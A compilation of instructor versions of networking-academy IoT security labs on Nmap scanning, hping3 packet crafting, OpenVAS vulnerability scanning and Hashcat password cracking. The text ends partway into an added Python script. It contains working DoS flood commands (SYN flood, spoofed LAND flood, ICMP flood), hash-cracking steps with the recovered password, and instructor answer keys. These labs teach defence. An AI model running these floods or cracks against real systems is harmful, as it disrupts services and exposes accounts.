e. Open the man page for nmap in Kali VM and review the options that are available in Nmap.
root@kali:~# man nmap

 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 2 of 7 www.netacad.com
Lab - Port Scanning an IoT Device

Refer to the man page and complete the table below. There are many other resources available online to
help you learn Nmap.

Option   Name                Notes
                             Scans every address in the network or range of addresses.
-sL      list scan           Uses reverse-DNS to attempt to discover the names of each host.
-sn      no port scan        Nmap will do a host discovery scan, but will not do the normal port scan.
-Pn      no ping             Nmap does no host discovery at all. It conducts the normal port scan on all
                             hosts in the network or range.
-n       no DNS resolution   Nmap skips the reverse DNS part of the host discovery process. This can
                             speed up scanning drastically, and is useful when scanning LANs, which
                             usually don't have DNS names provided to hosts.

f. Perform a scan on your network by specifying the network address and bit mask.
root@kali:~# nmap 203.0.113.0/24
What is the IP address of the Raspberry Pi?
____________________________________________________________________________________
Answers will vary. The assigned IP address will be in the network of 203.0.113.0/24.
g. Sometimes a device will not reply to Nmap’s initial network discovery scan because of a firewall, an
IDS/IPS system, etc. Instead of relying on the initial scan to discover hosts that are alive for further
scanning, we can use Nmap to scan the network by assuming all hosts are alive.
root@kali:~# nmap -Pn 203.0.113.0/24
What is the IP address and MAC address of your Raspberry Pi?
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary.

Part 2: Compare an Nmap TCP Default Scan and Full Scan

Step 1: Using Wireshark to display Nmap scans


a. In a Kali VM terminal, start Wireshark. Wireshark is used to monitor the traffic while scanning the network
using Nmap. Click OK for the warning message regarding running Wireshark as a root user.
root@kali:~# wireshark
b. Select the eth0 interface and click Capture to start capturing packets.
c. There can be a lot of traffic on the network. A display filter is applied to limit the captured packets
displayed to just those that you are interested in: the traffic between the IP address of the Kali VM and the
IP address of the Raspberry Pi. Apply the following display filter in Wireshark, using the IP address of the
Kali VM as the source address and the IP address of your Raspberry Pi as the destination address.
ip.src == 203.0.113.1 && ip.dst == 203.0.113.13


As an example in this lab, the IP address for the Raspberry Pi is 203.0.113.13.

Step 2: Nmap TCP default scan


a. In the terminal, enter the following command to start the Nmap scanning.
root@kali:~# nmap 203.0.113.13
After Nmap reports the result of the scan, stop the Wireshark capture. Click the arrow next to the display
filter field to filter the results of the scan.
Review the Wireshark output. Which TCP flag is Nmap using to discover the open ports?
____________________________________________________________________________________
SYN
Notice the ports that are being tested. The default Nmap scan does not test all ports. How many ports
does a default Nmap scan test? (Do a web search if necessary.)
____________________________________________________________________________________
Only 1,000 of the most common ports.
Look at the results of the nmap scan in the terminal. What ports are identified?
____________________________________________________________________________________
____________________________________________________________________________________
Answers may vary. Ports 22 and 80 should be open, but others may also be found.

Step 3: Nmap full TCP port scan


a. By default, Nmap only scans a limited number of TCP ports. We would like to scan all 65535 TCP ports.
b. Start a new Wireshark capture. Click Continue without Saving when prompted to save the capture.
c. Enter the nmap command to scan all the TCP ports in Kali VM.
root@kali:~# nmap -p 1-65535 203.0.113.13
d. Watch the Wireshark capture screen. Notice you are sending TCP packets just as before, but the number
of ports being scanned has increased.
e. Stop the Wireshark capture when finished and clear the filter.

Part 3: Perform an Nmap UDP Scan

UDP Header Format


Source Port Destination Port
Length Checksum

Step 1: UDP scan with a new Wireshark filter.


a. Start a new Wireshark capture. Click Continue without Saving when prompted to save the capture.
b. Apply the following filter in Wireshark:
ip.src == 203.0.113.13 && udp
This will allow us to see the UDP traffic generated by nmap to the Raspberry Pi. Notice in the UDP
header above that there are no flags. We can only send UDP packets and receive a possible “port
unreachable” or “destination unreachable” message, meaning the port is closed.
c. In the Kali VM terminal, enter the command nmap with -sU option scanning the IP address of your
Raspberry Pi.
root@kali:~# nmap -sU -F 203.0.113.13
d. It will take a few minutes, but look at the Wireshark capture. As you scroll down the packets, you will see
some “Destination unreachable” on different ports indicating the port is closed.
How many UDP ports are there? How many UDP ports does Nmap scan, by default? (Use web search as
necessary.)
____________________________________________________________________________________
There are 65,535 UDP ports. Nmap scans only the most commonly used 1,000.
What are the UDP ports that are open from the scan? What protocols use these UDP ports?
____________________________________________________________________________________
____________________________________________________________________________________
Answers may vary. Ports 68 and 5353 are most likely. BOOTP and Multicast DNS use these ports.
These services are used by PL-App.
What is the meaning of the -F option? Try the same scan without the -F. What is the difference?
____________________________________________________________________________________
____________________________________________________________________________________
The -F option stands for fast. Only the most common 100 ports are scanned. This makes the scan much
faster.
e. Stop the Wireshark capture when finished and clear the filter.

Part 4: Perform Nmap OS and Service Footprinting

Step 1: Use Nmap to find a device operating system.


Nmap can guess the operating system of a device based on its response to a series of TCP and UDP
packets.
a. Start a new Wireshark capture. Click Continue without Saving when prompted to save the capture.
b. Apply the following filter in Wireshark using IP address of Kali VM as the source address and IP address
of your Raspberry Pi as the destination address.
ip.src == 203.0.113.1 && ip.dst == 203.0.113.13
c. In the Kali VM terminal, enter the command nmap using the -O option scanning the IP address of your
Raspberry Pi.
root@kali:~# nmap -O 203.0.113.13
What operating system did Nmap guess?
____________________________________________________________________________________
____________________________________________________________________________________
Linux 3.2-4.8

 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 5 of 7 www.netacad.com
Lab - Port Scanning an IoT Device

Look at the packets in Wireshark. What protocols were used to determine the OS?
____________________________________________________________________________________
____________________________________________________________________________________
Answers may vary. TCP, UDP, & ICMP
d. We can sometimes identify a device by looking at the time to live (TTL) field of a local ping response,
which varies by device OS. See the table below:

Operating System TTL Response time

Cisco 255
Windows 128
Linux 64

In the Kali VM terminal, enter the command to ping your Raspberry Pi with 4 ICMP packets.
root@kali:~# ping -c4 203.0.113.13
What is the response time? Is it consistent with the Nmap identification?
____________________________________________________________________________________
____________________________________________________________________________________
The response time is 64 which is consistent with a Linux OS response.
e. Stop the Wireshark capture when finished.

Step 2: Use Nmap to find service versions


Nmap has a built-in database of about 2,200 well-known services that is used to help identify application
service versions.
a. Start a new Wireshark capture. Click Continue without Saving when prompted to save the capture.
Apply the same display filter as the previous step.
b. In the Kali VM, enter the nmap command with the -A option scanning the IP address of your Raspberry
Pi.
root@kali:~# nmap -A 203.0.113.13
What are the identified applications running on the ports? Complete the table.

Port Number Application service identified

22 SSH-2.0-OpenSSH_7.4p1
80 Tornado httpd 4.5.1
88 nginx 1.10.3
89 Node.js Express framework

Answers may vary, but ports 22 and 80 should at least be open.

 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 6 of 7 www.netacad.com
Lab - Port Scanning an IoT Device

What is different in the port identification from the Nmap TCP scan in Part 2 of the lab and this application
service scan? What implications does this have for IoT security?
____________________________________________________________________________________
____________________________________________________________________________________
In the normal TCP scan, only protocols are identified. In this scan, details about the running services are
also shown. These details can be used to identify versions of software services that have well-known
vulnerabilities.
What additional functions does this scan also perform?
____________________________________________________________________________________
____________________________________________________________________________________
Nmap also performs a traceroute and OS detection, and reports SSH details.
c. Stop the Wireshark capture when finished.

 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 7 of 7 www.netacad.com
Lab - Packet Crafting to Exploit Unsecured Ports (Instructor
Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Topology

Objectives
Part 1: Using hping3 for Port Scanning
Part 2: Crafting Different Types of ICMP Messages
Part 3: Launching DoS Attacks

Background / Scenario
hping3 is a tool used to send custom-crafted TCP/IP packets to a network target in order to elicit a response.
Many values in IP packets and TCP headers can be specified in hping3 and the resulting packets sent out on
the network. Like Nmap, hping3 can use the TCP header flag fields URG, ACK, PSH, RST, SYN, and FIN to
accomplish its scans. It can also craft packets with other protocols such as UDP and ICMP. Unlike Nmap,
however, hping3 can use its ability to craft packets to attack a target. hping3 is included in Kali or can be
downloaded from http://www.hping.org/. Because hping3 can be used for malicious purposes, avoid using it
on production networks unless you have permission to do so.

Required Resources
• Raspberry Pi 3 Model B or later
• 8GB Micro SD card (minimum required)
• PC with IoTSec Kali VM
• Network connectivity between PC and Raspberry Pi

Part 1: Using hping3 for Port Scanning


a. Set up the topology by connecting the Raspberry Pi to the PC.
b. Start and log into IoTSec Kali VM.
c. Open a terminal and start the DHCP server on Kali VM.
root@kali:~# lab_support_files/scripts/start_dhcp.sh
d. Verify that the Kali VM is assigned an IP address on eth0.
root@kali:~# ifconfig
e. Determine the IP address of your Raspberry Pi.
f. Open the man page for hping3 in Kali VM and review the features and options that are available in
hping3.
root@kali:~# man hping3
g. In a Kali VM terminal, start Wireshark to monitor what hping3 is doing when we are scanning.
root@kali:~# wireshark
h. In Wireshark, select the eth0 interface in packet capture.
i. You may have captured network traffic that is not relevant to this lab. We are going to restrict the type
of packets we see by using a display filter.
Apply the following filter in Wireshark using IP address of Kali VM as the source address and IP address
of your Raspberry Pi as the destination address. In this example, 203.0.113.1 is IP address for Kali VM
and 203.0.113.13 is the IP address of your Raspberry Pi.
ip.src == 203.0.113.1 && ip.dst == 203.0.113.13

 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 2 of 5 www.netacad.com
Lab - Packet Crafting to Exploit Unsecure Ports

j. We will first craft packets to do a port scan against the IP address of your Raspberry Pi.
root@kali:~# hping3 -8 0-100 -S 203.0.113.13
Refer to the Wireshark capture, the man pages, and other sources on the Internet. What do the options -8,
0-100 and -S do?
____________________________________________________________________________________
____________________________________________________________________________________
-8 signifies scan mode, 0-100 is the port range to be scanned, and -S sets the SYN flag in the scan.
What ports are shown as open?
____________________________________________________________________________________
Answers may vary. Ports 22 and 80 will be open at minimum.
k. Expand your scan to include ports up to 1000.
root@kali:~# hping3 -8 0-1000 -S 203.0.113.13
Did you find any additional ports?
____________________________________________________________________________________
No
What TCP flag was set in the packets shown in Wireshark?
____________________________________________________________________________________
SYN

Part 2: Crafting Different Types of ICMP Messages


ICMP has different message types that we can use to probe a target. For example, message types 8 - echo
request and 0 - echo reply are used with the TCP/IP tool “ping.” However, if a target is configured not to
respond to these ICMP message types, we can use other ICMP message types to attempt to get a response.
a. Open the man page for ICMP in Kali VM and review the features and options that are available in ICMP.
root@kali:~# man icmp
What is the RFC for ICMP?
____________________________________________________________________________________
RFC 792
b. Start a new Wireshark capture. Click Continue without Saving when prompted to save the capture.
Apply the same display filter as in the previous part.
c. In the terminal, enter the hping3 command followed by -1 to scan in ICMP mode. Add the scan target IP
address, and enter -C followed by 13 to indicate that ICMP type 13 timestamp request messages should
be sent.
root@kali:~# hping3 -1 203.0.113.13 -C 13
d. Review the Wireshark results and confirm that the ICMP timestamp request packets were sent out. To
stop the requests, press Ctrl-C in the Kali VM terminal.
e. Start a new Wireshark capture. Click Continue without Saving when prompted to save the capture.

f. Apply the following filter in Wireshark using IP address of Kali VM as the source address and IP address
of your Raspberry Pi as the destination address.
ip.src == 203.0.113.1 && ip.dst == 203.0.113.13
g. Repeat the hping3 command above, but this time send ICMP type 17 (-C 17).
h. Review the Wireshark results. Which ICMP message was sent?
____________________________________________________________________________________
Address Mask Request

Part 3: Launching DoS Attacks


Hping3 can launch DoS attacks against ports you found previously in this lab. Using hping3 for this purpose is
a good way to test how a network will react to various types of DoS attacks.
a. Start a new Wireshark capture. Click Continue without Saving when you are prompted to save the
capture. To see two-way TCP traffic between the Kali VM and the Raspberry Pi, enter only tcp as a
display filter.
b. In the Kali VM terminal, enter the hping3 command to send a DoS attack.
root@kali:~# hping3 -S 203.0.113.13 -p 88 --flood
Looking at Wireshark and the hping3 documentation, what type of TCP messages were sent in this DoS
attack? What was the destination TCP port of the attack?
____________________________________________________________________________________
____________________________________________________________________________________
DoS SYN flood against port 88
Look at the source ports that hping3 uses to conduct the DoS flood. How does this scan assign source
TCP ports?
____________________________________________________________________________________
____________________________________________________________________________________
It starts at a random port and increments the source port number in each packet.
c. Press Ctrl-C to stop the flood.
d. Start a new Wireshark capture. Click Continue without Saving when prompted to save the capture.
Display only traffic whose source or destination IP address matches the IP address of the
Raspberry Pi. (Hint: Edit the ip.src and ip.dst display filter so that both use the IP address of the
Raspberry Pi, and use the || (or) operator instead of the && operator.)
e. In the Kali VM terminal, enter the hping3 command to send a DoS LAND attack. This attack sends
packets whose source IP/port combination is identical to the destination IP/port. In other words, the
source IP address is "spoofed" by replacing the Kali VM address with the target's own address in the packets.
root@kali:~# hping3 -S 203.0.113.13 -a 203.0.113.13 -k -s 89 -p 89 --flood
Compare this scan with the SYN flood that you just ran. How were source ports used in this scan? What
info does Wireshark report about the packets?
____________________________________________________________________________________
The source port is fixed at 89 by -s 89 and kept by -k, so it does not increment. Wireshark reports that
TCP port numbers are reused.
f. Press Ctrl-C to stop the flood.


g. Start a new Wireshark capture. Click Continue without Saving when prompted to save the capture.
Apply the display filter that specifies the Kali VM as the source and the Raspberry Pi as the destination,
as was done previously in this lab.
h. In the Kali VM terminal, enter the hping3 command to send an ICMP flood attack.
root@kali:~# hping3 --flood --icmp -p 22 203.0.113.13
Note: ICMP has no ports, so hping3 ignores -p in ICMP mode; the option has no effect on the packets sent.
Look at Wireshark. What type of ICMP messages are you seeing?
____________________________________________________________________________________
Type 8 echo request
i. Press Ctrl-C to stop the flood.
j. Complete the following table for the hping3 options that you used in this lab. Use the hping3 man page or
other information resources.

Option    Name            Description
-8        scan mode       scans a range of TCP ports on the target host address provided
-S        set SYN flag    sets the SYN flag in the TCP header of the packets to be sent
-1        ICMP mode       sends ICMP echo request packet(s) unless another type of packet has been specified
-C        icmptype        used to set the ICMP packet type
--flood   N/A             send packets as fast as possible without waiting for replies
-a        spoof hostname  set a fake IP source address
-p        destport        specify destination TCP port
-s        baseport        specify TCP source port, or port at which to start a scan in which the port number is increased for each packet sent
-k        keep            retains the specified source port instead of incrementing it with each packet that is sent
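As an added example that is not part of the lab, the following Python script shows what the traffic from the three hping3 runs in this lab (the SYN scan, the SYN flood against port 88, and the LAND flood) looks like to a detector on the receiving side. It works on per-packet records in the layout that `tshark -T fields -e frame.time_relative -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -e tcp.flags` would produce from your capture; the records embedded in the script are constructed to mirror the lab traffic, not taken from a real capture. The thresholds (20 distinct ports, 100 SYNs per second) are assumptions you would tune for your own network.

```python
"""Offline detection of the hping3 traffic patterns produced in this lab.

Added example, not part of the original lab. Input records have the layout
  time_relative <TAB> ip.src <TAB> tcp.srcport <TAB> ip.dst <TAB> tcp.dstport <TAB> tcp.flags
as exported by `tshark -T fields`. The records below are constructed.
"""
from collections import Counter, defaultdict

SYN_ONLY = 0x002  # tcp.flags value of a bare SYN, which is what hping3 -S sends


def parse_record(line):
    """Parse one tab-separated record into (time, src, sport, dst, dport, flags)."""
    t, src, sport, dst, dport, flags = line.rstrip("\n").split("\t")
    return (float(t), src, int(sport), dst, int(dport), int(flags, 16))


def detect_port_scan(records, min_ports=20):
    """Sources that sent bare SYNs to at least min_ports distinct ports on one host.

    Returns {(src, dst): distinct_port_count}. Matches `hping3 -8 0-100 -S`.
    """
    ports = defaultdict(set)
    for _, src, _, dst, dport, flags in records:
        if flags == SYN_ONLY:
            ports[(src, dst)].add(dport)
    return {k: len(v) for k, v in ports.items() if len(v) >= min_ports}


def detect_syn_flood(records, window_s=1.0, threshold=100):
    """Destination ports that received at least threshold bare SYNs in one window.

    Returns {(dst, dport): peak_syns_per_window}. Matches `hping3 -S -p 88 --flood`.
    """
    buckets = Counter()
    for t, _, _, dst, dport, flags in records:
        if flags == SYN_ONLY:
            buckets[(dst, dport, int(t // window_s))] += 1
    peak = {}
    for (dst, dport, _), n in buckets.items():
        if n >= threshold:
            peak[(dst, dport)] = max(n, peak.get((dst, dport), 0))
    return peak


def detect_land(records):
    """Packets whose source IP:port equals their destination IP:port (LAND attack).

    Matches `hping3 -S <target> -a <target> -k -s 89 -p 89 --flood`.
    """
    return [r for r in records if r[1] == r[3] and r[2] == r[4]]


def constructed_capture():
    """Made-up records mirroring the lab traffic; not a real capture."""
    lines = []
    # hping3 -8 0-100 -S 203.0.113.13: one SYN per destination port 0..100
    for p in range(101):
        lines.append(f"{0.01 * p:.3f}\t203.0.113.1\t{30000 + p}\t203.0.113.13\t{p}\t0x002")
    # hping3 -S 203.0.113.13 -p 88 --flood: 500 SYNs to port 88 within half a second
    for i in range(500):
        lines.append(f"{5 + 0.001 * i:.3f}\t203.0.113.1\t{41000 + i}\t203.0.113.13\t88\t0x002")
    # LAND flood: source and destination are both 203.0.113.13:89
    for i in range(50):
        lines.append(f"{9 + 0.001 * i:.3f}\t203.0.113.13\t89\t203.0.113.13\t89\t0x002")
    # benign established SSH traffic (ACK only) that should trigger nothing
    for i in range(30):
        lines.append(f"{12 + 0.1 * i:.3f}\t203.0.113.1\t52000\t203.0.113.13\t22\t0x010")
    return lines


def analyse(lines):
    """Run all three detectors over raw record lines and return a summary dict."""
    records = [parse_record(line) for line in lines]
    return {
        "port_scans": detect_port_scan(records),
        "syn_floods": detect_syn_flood(records),
        "land_packets": len(detect_land(records)),
    }


if __name__ == "__main__":
    for name, result in analyse(constructed_capture()).items():
        print(f"{name}: {result}")
```

Run it as is to see the summary, or feed real tshark output lines to analyse(). The LAND packets are the easiest to catch because no legitimate packet has identical source and destination endpoints; the scan and flood detectors depend on the thresholds, which is why real deployments tune them per segment.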

Lab – Use OpenVAS for Vulnerability Assessment (Instructor
Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Addressing Table

Device           IP Address    Subnet Mask
Kali             203.0.113.1   255.255.255.0
Metasploitable   203.0.113.5   255.255.255.0
Objectives
Part 1: Exploring OpenVAS
Part 2: Configuring a Vulnerability Scan
Part 3: Reviewing the Results

Background / Scenario
As we know, IoT devices, especially those designed for the home, frequently include web applications that
are accessed from the Internet. These applications are a significant part of the IoT system attack surface. A
vulnerable web application could allow attackers to take over a home automation application and cause
damage to property, for example.
Open Vulnerability Assessment System (OpenVAS) is a framework that provides services and tools for network
and web application vulnerability scanning and management. OpenVAS uses Network Vulnerability Tests (NVTs)
to check for known security issues. Many NVTs are written against entries in Common Vulnerabilities and
Exposures (CVE).
CVE is a publicly available list of known security vulnerabilities and exposures. Each entry provides an
identification number, a description, and public references for the issue. The goal of CVE is to enable the
sharing of data across different vulnerability tools, repositories, and services.
CVE entries are typically scored with the Common Vulnerability Scoring System (CVSS). CVSS provides an open
and standardized way of scoring vulnerabilities. The score allows an organization to prioritize which
vulnerabilities to fix and to assess the impact of the vulnerabilities on its systems. CVE and CVSS are used
together, but they are different systems: CVE identifies a vulnerability, CVSS rates its severity.
In this lab, you will use OpenVAS to perform a vulnerability scan on the intentionally vulnerable Metasploitable
VM and review the vulnerability assessment report from the scan.

Required Resources
• Host computer with at least 4 GB of RAM and 15 GB of free disk space
• Oracle VirtualBox
• IoT Security Kali and Metasploitable VMs


Part 1: Exploring OpenVAS


a. Start the Metasploitable and Kali VMs.
b. Log into the Metasploitable VM.
username: msfadmin
password: msfadmin
c. Enter the command ifconfig at the prompt to determine the IP address of Metasploitable VM.
What is the IP address? ___________________________________________________ 203.0.113.5
d. Log into IoTSec Kali VM.
e. Open a terminal in the IoTSec Kali VM and ping the Metasploitable VM to verify connectivity. If the ping is
not successful, verify that both the Metasploitable and Kali VMs are using the same VM network.
f. In a terminal, enter the command openvas-start to start OpenVAS service.
root@kali:~# openvas-start
[*] Please wait for the OpenVAS services to start.
[*]
[*] You might need to refresh your browser once it opens.
[*]
[*] Web UI (Greenbone Security Assistant): https://127.0.0.1:9392
<some output omitted.>
g. In a terminal, enter the command more lab_support_files/openvas_info to view the content in the file
openvas-info for the username and password info to access OpenVAS in the web browser.
root@kali:~# more lab_support_files/openvas_info
User: admin
Pass: b0b22778-f1d5-459f-8320-4c47bad49942

Greenbone Web Interface:


https://127.0.0.1:9392
or
https://localhost:9392
h. After you have logged into OpenVAS, notice that the Dashboard provides information regarding
tasks, CVEs, host topology, and NVTs at a glance.
How many total CVEs are loaded into OpenVAS? _______________________________ 107824
How many total NVTs are loaded into OpenVAS? _______________________________ 45368
You can also click the different parts of the graphs to review the CVE or NVT details.
Now you are ready to start a vulnerability scan.

Part 2: Configuring a Vulnerability Scan

Step 1: Create the target.


In this step, you will configure Metasploitable VM as the target of your vulnerability scan.
a. In the menu at the top of the OpenVAS page, click Configuration -> Targets.


b. Click the white star in the blue box icon in the upper left-hand corner below the Dashboard menu.
c. When the New Target dialog box appears, enter the following information:
Name: Metasploitable VM
Hosts Manual: 203.0.113.5
Alive Test: Consider Alive.
d. Click Create. This process discovers targets that can be scanned in an OpenVAS task.

Step 2: Create a task.


In this step, you will configure a task to perform a vulnerability scan on the Metasploitable target.
a. Click Scans -> Tasks.
b. You will see a welcome page if this is the first visit to the Tasks page.
c. Click the white star in the blue box icon in the upper left-hand corner below the Dashboard menu. Select
New Task.
d. Name it Metasploitable. Verify Metasploitable VM is selected in the Scan Targets field. Leave the other
settings as is. Click Create to create a new task.
e. The new Metasploitable task is listed in the Tasks list. Click the Start button under the Actions menu
associated with the new Metasploitable task.
f. The status for the Metasploitable task will change to Requested.
g. Ensure that the web page will be refreshed automatically by changing the dropdown menu in the green
banner at the top of the page. It is currently set to No auto-refresh. Choose the desired refresh rate in the
dropdown menu.

Part 3: Reviewing Results


The entire scan of the Metasploitable VM will take about 40 minutes to complete. While the scan proceeds,
you can review reports for tasks that have been previously run.
a. Click Scans > Reports to review previously completed scans. Select a report and click it.
b. Locate the Filter field in the upper right of the results page. Click the blue wrench icon next to the Filter
field. OpenVAS can return many results. Filtering helps make scan results easier to read. This box allows
you to specify how many results you want to see, the vulnerability severity, and the number of results per
page. In addition, columns can be sorted by clicking the column heading.
c. Review the list of vulnerabilities. They are rated by severity as Log, Low, Medium, and High. Explore
information about the discovered vulnerabilities for the different levels of severity. To start, locate a
vulnerability at the Log level of severity. Find one that makes sense to you and answer the questions
below. Repeat the process for the other levels of severity.
Severity: Log
What is the vulnerability and its impact?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________


Answers will vary. Example: TCP timestamps allow a remote user to estimate the uptime of a computer.
What is the provided solution?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary. The TCP timestamps can be disabled.
Linux: add the line 'net.ipv4.tcp_timestamps = 0' to /etc/sysctl.conf. Execute 'sysctl -p' to apply the settings at
runtime.
Windows (excluding Server 2008 and Vista): execute 'netsh int tcp set global timestamps=disabled'
Severity: Low
What is the IP address and port number on the host? _________________________ Answers will vary.
What is the vulnerability and its impact?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary.
What is the provided solution?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary.
Severity: Medium
What is the IP address and port number on the host? _________________________ Answers will vary.
What is the vulnerability and its impact?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary.


What is the provided solution?


_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary.
Severity: High
What is the IP address and port number on the host? _________________________ Answers will vary.
What is the vulnerability and its impact?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary.
What is the provided solution?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary.

Part 4: The Metasploitable Scan Results


In this part of the lab, you will return to the Metasploitable scan task and review the results.
a. Go to the Scans menu at the top of OpenVAS page and select Tasks.
b. Verify that the status of the Metasploitable task is Done. If it is not done, continue investigating the
OpenVAS tool and vulnerabilities until the scan has completed.
c. Click the Done button in the Status column of the tasks table for the Metasploitable task that you created.
This will display the report for the Metasploitable scan task.
How many vulnerabilities did OpenVAS find?
____________________________________________________________________________________
____________________________________________________________________________________
Answers may vary. The result should be approximately 260.
d. By default, OpenVAS filters the results of a scan to vulnerabilities with a QoD (Quality of Detection) of
70% or higher. QoD is a measure of how reliable the detection method behind a result is.
Click the Severity column header in the report to sort the results based on Severity.


e. Locate the OS End of Life Detection vulnerability. Investigate this vulnerability by clicking it and
exploring the explanation. What is this vulnerability and why is it a security vulnerability?
____________________________________________________________________________________
____________________________________________________________________________________
The OS running on Metasploitable is Ubuntu 8.04, which reached end of life in May 2013. Security patches
for the OS are no longer created or distributed, so any vulnerability discovered in this version since it went
EOL remains exploitable.
f. Investigate the vulnerability called phpinfo() output accessible. Open the Metasploitable phpinfo page in
your Kali browser. What kind of information contained on that page could be used by hackers?
____________________________________________________________________________________
____________________________________________________________________________________
A large amount of information about PHP is displayed on this page including PHP and module versions,
configuration information, internal IP addresses, etc. This is information that shouldn't be available to
users on the open web.
g. Investigate the vulnerability called /doc directory browsable. Open the /doc directory in your browser.
How could a hacker use this access to attack a system?
____________________________________________________________________________________
____________________________________________________________________________________
They could find out what software and software versions are running on the server.

Lab - Challenge Passwords with Kali Tools (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
In this lab, you will explore tools that are available in the Kali VM to challenge passwords.
Part 1: Using Hashcat to Challenge Passwords
Part 2: Investigating Other Password Challenging Tools on Kali Linux

Background / Scenario
There are numerous Kali tools used to challenge passwords. It is very likely that you have already seen and/or
used John the Ripper (john). John is a very powerful tool, but there are other tools that might be more
appropriate depending on the situation. It is important to be aware of as many tools as possible so that
you can select the most appropriate one for the task at hand.
Hashcat is a very powerful password challenging tool that offers different features and has other advantages
in comparison to John the Ripper that you might find helpful to know how to use. Hashcat is an offline
password cracking tool that claims to be the world's fastest password recovery tool; it runs on CPUs and,
where available, GPUs. It offers various attack modes including dictionary, brute force, and combination
attacks. For the purposes of this lab, we will use the combination attack, because we have partial
information about the target password. We will use it to recover the password of a serious golf fan.

Required Resources
• PC with IoTSec Kali VM installed
• Internet connection

Part 1: Using Hashcat to Challenge Passwords

Step 1: Set up the environment and open a terminal window.


a. Start the IoT Security lab topology with Kali VM. Log into Kali VM with the username root and password
toor.
b. Open a terminal on the Kali VM.
c. Create a directory called passwordlab:
root@kali:~# mkdir passwordlab
d. Move into this directory:
root@kali:~# cd passwordlab

Step 2: Create the necessary dictionary files and MD5 hash file.
An MD5 hash value has been recovered for a user, and it is your job to crack this value. Rather than using a
brute force method that could take a long time, you will use known information to crack this value much
more quickly. The user is a golf fan and has specifically talked about Tiger Woods. In addition, it was discovered
from one of his public social media profiles that he graduated in 2002.


It is very typical for users to create passwords using words from their special interests or hobbies. When their
special interests are known, wordlists can be very helpful in recovering passwords or cracking hashes. There
are numerous sites that provide wordlists for a wide variety of interests. For example:
https://packetstormsecurity.com/Crackers/wordlists/
This site provides a golfers.gz file that contains a list of golf names/words that can be used as a wordlist. It is
also known that users will usually take a name and make the password more complicated by repeating
the name or word and/or adding numbers or special characters to it.
The following MD5 hash value was provided to you by a known golf fan, and it is your job to crack it:
22bb33653af9cc8f21d71fa0e55751b4
An MD5 digest is 128 bits long and is written as 32 hexadecimal characters, that is, the digits 0 through 9
and the letters a through f.
For the purposes of this lab, and because of time constraints, we will create our own dictionaries and use just
a few words per dictionary.
a. Create a dictionary file using multiple combinations of "tiger woods":
root@kali:~/passwordlab# echo "tiger woods" > dict1.txt
root@kali:~/passwordlab# echo "tiger" >> dict1.txt
root@kali:~/passwordlab# echo "woods" >> dict1.txt
root@kali:~/passwordlab# echo "golf" >> dict1.txt
root@kali:~/passwordlab# more dict1.txt
b. The second dictionary file is the one whose entries Hashcat will append to each word of the first
file in the combination attack. It is very common for users to add numbers to their passwords to make them
longer and to meet minimum length requirements.
root@kali:~/passwordlab# echo "0" > dict2.txt
root@kali:~/passwordlab# echo "1" >> dict2.txt
root@kali:~/passwordlab# echo "2" >> dict2.txt
root@kali:~/passwordlab# echo "2002" >> dict2.txt
root@kali:~/passwordlab# echo "02" >> dict2.txt
root@kali:~/passwordlab# more dict2.txt
c. Save the md5 hash value into a text file called hash.txt:
root@kali:~/passwordlab# echo "22bb33653af9cc8f21d71fa0e55751b4" > hash.txt
d. If there are any typos with the hash when entering it, the lab will not work.
What command did you use to view the content in the file hash.txt? _____________________________
more hash.txt

Step 3: Crack a known MD5 hash value using Hashcat.


a. Use the man pages for hashcat to answer the following questions:
root@kali:~/passwordlab# man hashcat
What command should be used for an MD5 hash? ___________________________________________
hashcat -m 0
What command should be used for the attack mode of combination? _____________________________


hashcat -a 1
b. The --force option below is required because you are running hashcat inside a VM without a supported
OpenCL device; without it, hashcat refuses to start and tells you to use --force.
root@kali:~/passwordlab# hashcat -m 0 -a 1 --force hash.txt dict1.txt dict2.txt
Note: Hashcat records every cracked hash in its potfile and will not crack the same hash again. To rerun the
attack against the same hash value, add the --potfile-disable option:
root@kali:~/passwordlab# hashcat -m 0 -a 1 --force hash.txt dict1.txt dict2.txt --potfile-disable
c. Review the output from this command and answer the following questions:
What was the recovered password from the MD5 hash? _______________________________________
tiger02
What was the status? __________________________________________________________________
Cracked
How long did it take? ___________________________________________________________________
3 seconds
d. To view the saved passwords from the hash.txt file use the following command:
root@kali:~/passwordlab# hashcat --show hash.txt
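The following added Python script (not part of the lab, and not hashcat's own code) reproduces the combination attack offline so you can see exactly which candidates `hashcat -a 1` tries and in what order. The word lists are the contents of dict1.txt and dict2.txt embedded inline; the demo target is computed from a constructed password so that the script verifies itself, and the lab's hash is tried as well. The both_orders option goes beyond hashcat's -a 1, which only builds left+right; with hashcat you would rerun with the two lists swapped to get the same effect.

```python
"""Combinator attack in pure Python.

Added example, not part of the lab. Mirrors `hashcat -m 0 -a 1 hash.txt
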